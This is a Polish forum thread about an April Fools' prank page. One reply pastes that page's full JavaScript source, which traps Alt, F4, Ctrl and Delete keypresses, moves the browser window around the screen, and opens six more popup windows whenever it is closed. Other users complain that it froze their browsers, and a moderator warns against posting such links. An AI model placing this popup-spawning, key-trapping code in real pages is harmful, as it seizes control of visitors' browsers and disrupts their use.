Skocz do zawartości
Dijkstra

Chcesz, żeby Cię szlag trafił? Śmiało tutaj ;-D

Rekomendowane odpowiedzi

Zajebista galeria :o

Az mi wszystkie Explorery zamknelo :P

 

<script language=Javascript>function altf4key() { if (event.keyCode == 18 || event.keyCode == 115) alert("Prima Aprilis :)"); }function ctrlkey() { if (event.keyCode == 17) alert("Prima Aprilis :)"); }function delkey() { if (event.keyCode == 46) alert("Prima Aprilis :)"); }  var xOff = 5;  var yOff = 5;  var xPos = 400;  var yPos = -100;  var flagRun = 1;function openWindow(url){        aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes');}function procreate(){  openWindow('naga2.html');  openWindow('naga2.html');  openWindow('naga2.html');  openWindow('naga2.html');  openWindow('naga2.html');  openWindow('naga2.html');  }function newXlt(){        xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10;        window.focus()}function newXrt(){        xOff = Math.ceil(7 * Math.random())  * 5 - 10;        }function newYup(){        yOff = Math.ceil( 0 - 6 * Math.random())  * 5 - 10;        }function newYdn(){        yOff = Math.ceil( 7 * Math.random())  * 5 - 10 ;        }function fOff(){        flagrun = 0;        }function playBall(){        xPos += xOff;        yPos += yOff;        if (xPos > screen.width-175){        newXlt();        }        if (xPos < 0){        newXrt();        }        if (yPos > screen.height-100){        newYup();        }        if (yPos < 0){        newYdn();        }        if (flagRun == 1){        window.moveTo(xPos,yPos);        setTimeout('playBall()',1);        }        }</script></head><body bgColor=#ffffff onload="flagRun=1;playBall();return true;" onKeyDown="altf4key();ctrlkey();delkey();" onUnLoad="procreate()" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="100%" height="100%">  <param name=movie value="youare.swf">  <param name=quality value=high>  <embed src="youare.swf" tppabs="youare.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%">  </embed> </object>

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Trochę po czasie, ale zawsze...

KONIECZNIE  OTWÓRZCIE TO W I-EXPLORERZE.

 

http://www.extras2.republika.pl/

 

Można oc...pieć  :x  :x  :x

Niech ja jeszcze raz zobacze post z linkiem do mnożących sie okienek, to ten co go napisał pożałuje, że żyje :evil: :evil: :evil:

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Trochę po czasie, ale zawsze...

KONIECZNIE  OTWÓRZCIE TO W I-EXPLORERZE.

 

http://www.extras2.republika.pl/

 

Można oc...pieć  :x  :x  :x

Niech ja jeszcze raz zobacze post z linkiem do mnożących sie okienek, to ten co go napisał pożałuje, że żyje :evil: :evil: :evil:

Pokornie błagam o wybaczenie. Prośbę swą motywuje brakiem podobnych wygroczeń w przeszłości...

:? :? :?

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

a u mnie nic się nie pojawiło poza Dzis jest 1 kwietnia :| i dalej nic :)

dopal drugi raz......

za 1 razem to samo

za drugim juz troche bylo,z a trzecim.....wylaczylem wszystkie zadania ;]

Próbowałem kilka razy - może dlatego że mam MyIE i Ad Muncher zainstalowane :|

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Dołącz do dyskusji

Możesz dodać zawartość już teraz a zarejestrować się później. Jeśli posiadasz już konto, zaloguj się aby dodać zawartość za jego pomocą.

Gość
Dodaj odpowiedź do tematu...

×   Wklejono zawartość z formatowaniem.   Przywróć formatowanie

  Dozwolonych jest tylko 75 emoji.

×   Odnośnik został automatycznie osadzony.   Przywróć wyświetlanie jako odnośnik

×   Przywrócono poprzednią zawartość.   Wyczyść edytor

×   Nie możesz bezpośrednio wkleić grafiki. Dodaj lub załącz grafiki z adresu URL.

Ładowanie


×
×
  • Dodaj nową pozycję...